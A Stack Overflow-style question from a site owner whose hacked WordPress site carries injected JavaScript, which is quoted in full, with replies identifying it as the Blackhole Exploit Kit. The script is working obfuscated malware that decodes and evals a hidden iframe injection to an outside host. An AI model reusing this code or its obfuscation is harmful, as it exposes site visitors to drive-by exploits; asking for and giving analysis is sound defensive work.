# My wordpress site was hacked, anyone tell what this code does?

Tags: javascript, wordpress

So I know the site was hacked. Strangely, when I visit the site, and look at the source code, sometime this shows up. Sometimes it isn't there. That makes me worried that this is going to be hard to get rid of. But here is the code. Can anyone give me some insight? Thank you.

`var a=!1;oq = "\x6C\x6F\x6E\x6C\x79";if(!document.cookie.match(oq)){if(window.document)try{location(12);}catch(qqq){zz='eval';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='fromChar';f+='Code';}ee='e';e=window[zz];t='y';}h=Math.atan2(3,0)/Math.PI*-4;n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a5.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a5.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a5.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a55a56a49.5a48.5a51.5a54.5a57.5a56.5a22a48.5a51a22a50.5a50.5a22.5a51.5a54a22a48.5a50.5a51.5a30.5a24a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a5.5a3.5a3.5a61.5a5.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a5.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a55a56a49.5a48.5a51.5a54.5a57.5a56.5a22a48.5a51a22a50.5a50.5a22.5a51.5a54a22a48.5a50.5a51.5a30.5a24a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a5.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a5.5a3.5a3.5a61.5".split("a");for(i=0;i<569;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);ic=new Date;ic.setTime(ic.getTime());bh=new Date(ic.getTime()+72E6);document.cookie=oq+"="+escape(bh.toGMTString())+";expires="+bh.toGMTString()+";path=/";};`

Comment: maybe link a [pastebin](http://pastebin.com/). It's long & truncated.

Comment: Great.  Now you've gone and broken stackoverflow too.

Comment: Kirk, what do you mean by that?

Comment: Looks very similar to http://stackoverflow.com/questions/9478863/what-is-the-purpose-of-this-javascript-hack

Comment: @ron, I was sardonically referring to the broken formatting above the word "viewed" on the right.

Comment: Thanks, gave me good chuckle!

Answer (score 1):

Well, that looks like the code for the Blackhole Exploit Kit.

http://www.google.com/support/forum/p/Webmasters/thread?tid=3dd6eae1371cf604&hl=en

As linked by matthewk above, [What is the purpose of this JavaScript hack?](https://stackoverflow.com/questions/9478863/what-is-the-purpose-of-this-javascript-hack) describes how the code works. You might also want to read this: http://blog.imperva.com/2011/12/deconstructing-the-black-hole-exploit-kit.html

Comment: Thank you very much, I'm going to go research those links.